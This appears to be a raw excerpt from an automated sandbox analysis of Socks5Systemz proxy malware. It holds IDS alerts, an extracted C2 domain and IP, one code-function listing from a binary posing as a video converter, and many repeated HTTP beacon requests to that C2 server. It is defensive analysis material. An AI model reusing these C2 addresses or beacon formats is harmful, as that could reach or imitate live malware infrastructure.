Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49735 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49763 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49739 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49711 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49701 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49719 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49708 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49757 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49764 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49752 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49759 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49762 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49758 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49746 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49716 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49729 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49755 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49754 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49732 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49723 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49722 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49738 -> 185.196.8.214:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49725 -> 185.196.8.214:80
Source: Malware configuration extractor | URLs: bwdroig.com
Source: Joe Sandbox View | IP Address: 185.196.8.214
Source: Joe Sandbox View | ASN Name: SIMPLECARRER2IT
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknown | UDP traffic detected without corresponding DNS query: 141.98.234.31
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe | Code function: 3_2_02D872A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free | 3_2_02D872A7
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1Host: bwdroig.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
